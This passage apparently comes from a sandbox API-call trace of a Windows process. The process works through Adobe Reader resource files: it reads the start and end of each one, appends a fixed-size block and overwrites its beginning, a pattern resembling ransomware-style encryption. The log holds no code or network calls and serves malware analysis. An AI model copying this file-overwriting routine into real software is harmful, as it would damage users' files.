cchWideChar=9, lpMultiByteStr=0x1f735cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="est32.clx", lpUsedDefaultChar=0x0) returned 9 [0092.462] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.466] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6fec [0092.466] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.467] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x6fec [0092.468] WriteFile (in: hFile=0x1f8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.469] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0092.469] WriteFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.469] CloseHandle (hObject=0x1f8) returned 1 [0092.469] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn21.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn21.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0092.475] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0092.475] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x44280 [0092.475] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0092.475] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.476] ReleaseMutex (hMutex=0x168) returned 1 [0092.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frn21.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.476] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frn21.hsp", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="frn21.hsp", lpUsedDefaultChar=0x0) returned 9 [0092.476] ReadFile (in: hFile=0x1f8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0092.478] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x43280 [0092.478] ReadFile (in: hFile=0x1f8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.480] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x43280 [0092.480] WriteFile (in: hFile=0x1f8, lpBuffer=0x288ce18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ce18*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.480] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0092.480] WriteFile (in: hFile=0x1f8, lpBuffer=0x28ae9a8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x28ae9a8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0092.481] CloseHandle (hObject=0x1f8) returned 1 [0092.481] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\grm.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\grm.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f8 [0092.482] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0092.482] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xb400 [0092.483] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0092.483] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.483] ReleaseMutex (hMutex=0x168) returned 1 [0092.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="grm.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0092.483] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="grm.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="grm.hyp", lpUsedDefaultChar=0x0) returned 7 [0092.483] ReadFile (in: hFile=0x1f8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0095.592] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa400 [0095.592] ReadFile (in: hFile=0x1f8, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0095.593] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xa400 [0095.594] WriteFile (in: hFile=0x1f8, lpBuffer=0x1ea3958*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea3958*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0095.594] SetFilePointer (in: hFile=0x1f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0095.594] WriteFile (in: hFile=0x1f8, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0095.594] CloseHandle (hObject=0x1f8) returned 1 [0095.595] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hrv.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hrv.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0097.321] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.321] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2800 [0097.321] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.321] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.321] ReleaseMutex (hMutex=0x168) returned 1 [0097.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hrv.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0097.321] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hrv.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac24, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hrv.hyp", lpUsedDefaultChar=0x0) returned 7 [0097.322] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.652] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1800 [0097.653] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.655] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1800 [0097.655] WriteFile (in: hFile=0x1ec, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.656] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0097.656] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.656] CloseHandle (hObject=0x1ec) returned 1 [0097.656] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\itl.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\itl.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0097.912] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.912] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3ec [0097.912] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.912] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.913] ReleaseMutex (hMutex=0x168) returned 1 [0097.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="itl.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0097.913] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="itl.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac3c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="itl.fca", lpUsedDefaultChar=0x0) returned 7 [0097.913] ReadFile (in: hFile=0x1d8, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3ec, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x2b1f2bc*=0x3ec, lpOverlapped=0x0) returned 1 [0097.931] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0097.931] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eace08*, nNumberOfBytesToWrite=0x974, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesWritten=0x2b1f2d0*=0x974, lpOverlapped=0x0) returned 1 [0097.931] CloseHandle (hObject=0x1d8) returned 1 [0097.932] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lavphon.env" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lavphon.env"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0097.932] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.932] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7ec [0097.932] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.933] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.933] ReleaseMutex (hMutex=0x168) returned 1 [0097.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lavphon.env", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0097.933] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lavphon.env", cchWideChar=11, lpMultiByteStr=0x1f7344c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lavphon.env", lpUsedDefaultChar=0x0) returned 11 [0097.933] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x7ec, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x2b1f2bc*=0x7ec, lpOverlapped=0x0) returned 1 [0097.949] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0097.949] WriteFile (in: hFile=0x1d8, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0xd74, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2b1f2d0*=0xd74, lpOverlapped=0x0) returned 1 [0097.950] CloseHandle (hObject=0x1d8) returned 1 [0097.950] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw38.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw38.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0097.952] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.952] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x4669e [0097.952] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.952] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.952] ReleaseMutex (hMutex=0x168) returned 1 [0097.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nrw38.hsp", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0097.952] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nrw38.hsp", cchWideChar=9, lpMultiByteStr=0x1f7320c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nrw38.hsp", lpUsedDefaultChar=0x0) returned 9 [0097.952] ReadFile (in: hFile=0x1d8, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0097.956] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4569e [0097.957] ReadFile (in: hFile=0x1d8, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.960] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x4569e [0097.961] WriteFile (in: hFile=0x1d8, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.961] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0097.961] WriteFile (in: hFile=0x1d8, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0097.961] CloseHandle (hObject=0x1d8) returned 1 [0097.961] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol103.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol103.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0097.963] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.963] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xafcef [0097.963] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.964] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.964] ReleaseMutex (hMutex=0x168) returned 1 [0097.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pol103.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.964] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="pol103.hsp", cchWideChar=10, lpMultiByteStr=0x1f735ac, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="pol103.hsp", lpUsedDefaultChar=0x0) returned 10 [0097.964] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0xf000, lpOverlapped=0x0) returned 1 [0097.967] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.970] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xaecef [0097.970] ReadFile (in: hFile=0x1d8, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.972] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0xaecef [0097.973] WriteFile (in: hFile=0x1d8, lpBuffer=0x2866a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2866a88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.974] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0097.974] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0xf000, lpOverlapped=0x0) returned 1 [0097.974] WriteFile (in: hFile=0x1d8, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.974] CloseHandle (hObject=0x1d8) returned 1 [0097.974] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\rum32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\rum32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0097.980] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.980] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7ff7 [0097.982] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0097.982] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.982] ReleaseMutex (hMutex=0x168) returned 1 [0097.982] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="rum32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, 